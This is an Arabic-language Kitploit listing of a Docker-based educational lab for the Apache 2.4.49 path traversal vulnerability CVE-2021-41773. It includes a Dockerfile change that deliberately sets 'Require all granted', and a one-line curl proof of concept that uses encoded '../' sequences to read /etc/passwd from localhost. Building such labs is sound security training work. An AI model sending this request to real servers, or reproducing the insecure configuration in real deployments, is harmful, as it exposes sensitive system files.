Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
cve-2021-41773 — بيئة مختبرية قائمة على Docker لثغرة اجتياز المسار في Apache CVE-2021-41773 مع استغلال إثبات المفهوم ودليل تفصيلي للاختبار الأمني والتعليم. | Kitploit
أدوات/GitHubGitHub/jiyun02/cve-2021-41773
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubjiyun02/cve-2021-41773

cve-2021-41773

بيئة مختبرية قائمة على Docker لثغرة اجتياز المسار في Apache CVE-2021-41773 مع استغلال إثبات المفهوم ودليل تفصيلي للاختبار الأمني والتعليم.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-41773 – تقرير Apache Path Traversal


ملخص

  • ثغرة تم اكتشافها في Apache HTTP Server 2.4.49، والتي يمكن أن تؤدي إلى كشف ملفات حساسة في النظام عبر هجوم Path Traversal وفقًا لإعدادات خادم الويب.
  • Path Traversal: يمكن للمهاجم استخدام مسارات تحتوي على ../ للوصول إلى ملفات خارج جذر الويب.

معلومات

  • اسم الثغرة: CVE-2021-41773
  • الإصدار المتأثر: Apache HTTP Server 2.4.49
  • نوع الثغرة: Path Traversal
  • توفر التصحيح الرسمي: تم إصلاحه في الإصدار 2.4.50 وما فوق.

إعداد بيئة التمرين

  • Base Image : 'httpd:2.4.49' (DockerHub)
  • طريقة تشغيل الحاوية: Dockerfile + docker-compose.yml
  • منفذ التشغيل: 8080 → مرتبط بالمنفذ 80 للحاوية
  • تعديل إعدادات Apache: تم تغييرها إلى 'Require all granted' (لتمكين Path Traversal)

طريقة تشغيل البيئة

  • git clone https://github.com/JIYUN02/cve-2021-41773.git
  • cd cve-2021-41773
  • docker-compose up --build

إثبات المفهوم (PoC) للثغرة

  • curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

العملية التفصيلية

  1. تشغيل الدليل الخاص بالمهمة صورة
صورة
  1. إعداد Dockerfile صورة

-> قاعدة الصورة: httpd:2.4.49 (الإصدار الذي يحتوي على الثغرة)

-> 'sed -i 's/Require all denied/Require all granted/g' : السماح بـ Path Traversal والوصول الخارجي

  1. docker-compose.yml صورة

-> تعريف Apache

-> تعيين المنفذ 8080 إلى المنفذ 80 للحاوية

  1. تشغيل Docker

    صورة
  2. تشغيل PoC

    صورة

-> curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

-> /etc/passwd يحتوي على معلومات حساسة، %2e هو الترميز لـ .. وهو أمر للانتقال إلى الدليل الأعلى

-> يتم التلاعب بالمسار ليجعل الخادم يصل إلى /etc/passwd ويخرجه

  1. نتيجة التشغيل صورة

-> كما هو موضح في الصورة أعلاه، يمكن الوصول إلى الدلائل الحساسة


عنوان المستودع القابل للوصول عبر Fork

https://github.com/JIYUN02/cve-2021-41773

-> يوجد تاريخ الالتزامات (commits)

تنزيل الأداة